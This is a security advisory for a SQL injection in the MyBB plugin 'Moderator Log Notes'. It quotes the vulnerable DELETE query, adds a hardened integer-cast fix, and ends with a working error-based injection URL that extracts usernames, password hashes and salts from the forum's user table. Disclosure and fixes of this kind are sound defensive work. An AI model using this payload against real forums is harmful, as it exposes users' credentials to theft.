Introduction
============
Moderator Log Notes is a MyBB plugin that lets forum moderators add notes.
SQL Injection
=============
-----------------[/inc/plugins/modnoteslog.php]-----------------
L.217
// $mybb->input['nid'] is taken from the request and concatenated into the query
// without being cast to an integer or escaped.
$db->query("DELETE FROM ".TABLE_PREFIX."modnotes WHERE nid=".$mybb->input['nid']);
-----------------[/inc/plugins/modnoteslog.php]-----------------
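The following is an added illustration, not code from the plugin: the vulnerable DELETE from L.217 placed beside a hardened variant that coerces nid to an integer before it reaches SQL. It assumes the MyBB globals $db, $mybb and TABLE_PREFIX as used in modnoteslog.php; the function names are hypothetical.

```php
<?php
// Added example (not the plugin's code). Assumes MyBB's $db, $mybb and TABLE_PREFIX
// globals as used in modnoteslog.php; function names below are hypothetical.

// Vulnerable: the raw request value is spliced into the SQL string, so anything
// after the digits (e.g. "1 and ...") becomes part of the WHERE clause.
function delete_note_vulnerable($db, $mybb)
{
    $db->query("DELETE FROM ".TABLE_PREFIX."modnotes WHERE nid=".$mybb->input['nid']);
}

// Hardened: nid is a numeric primary key, so cast it to int first. A non-numeric
// or trailing-garbage value collapses to its leading digits or 0, and ids <= 0
// are rejected before any SQL is built.
function delete_note_hardened($db, $mybb)
{
    $nid = isset($mybb->input['nid']) ? (int)$mybb->input['nid'] : 0;
    if ($nid <= 0) {
        return false;   // nothing valid to delete; the database is not touched
    }
    $db->query("DELETE FROM ".TABLE_PREFIX."modnotes WHERE nid=".$nid);
    return true;
}

// Database-free self-check: build the WHERE clause both ways for a constructed
// input with trailing SQL and compare what would actually be sent to MySQL.
function build_where_vulnerable($nid) { return "WHERE nid=".$nid; }
function build_where_hardened($nid)   { return "WHERE nid=".(int)$nid; }

$sample = "1 and 1=1";                       // constructed, attacker-style value
echo build_where_vulnerable($sample), "\n";  // trailing condition survives
echo build_where_hardened($sample), "\n";    // only the integer survives
```

On MyBB 1.8 the same coercion is available through $mybb->get_input('nid', MyBB::INPUT_INT), which is the idiomatic replacement for a bare $mybb->input[] read.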
Proof of concept
================
Error-based injection: http://[site]/modcp.php?action=deletenote&nid=1%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28select%20concat%28username,%200x3a,%20password,%200x3a,%20salt,%200x3a%29%20from%20mybb_users%20limit%201%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29--%20-
Groucho